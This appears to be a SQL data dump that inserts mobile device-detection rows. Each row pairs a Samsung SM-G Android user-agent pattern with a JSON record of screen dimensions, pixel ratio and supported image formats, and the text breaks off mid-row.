INSERT INTO `xyhmu_mj_amdd` VALUES ('Mozilla/5.0 (Linux; Android 4.*; SM-G350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G350) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3502L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3502L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3502T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3502T) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G350E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G350E) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G350L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355H) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355HN) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355HQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G355M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G357FZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G357FZ) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G357FZ-ORANGE/G357FZXXU1AQG2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G357M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360GY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360HU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G360P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3812B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G3815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G386F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G386F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G386T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G386T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G386W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G388F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G5108Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G5308W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530FZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530FZ) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G530Y) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7102) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7102) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7102T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7105L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7108) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7108V) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G710K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G710L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G710S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G720AX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G720N0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G730W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G7508Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G750H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G800HQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G800M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G850F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G9008W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 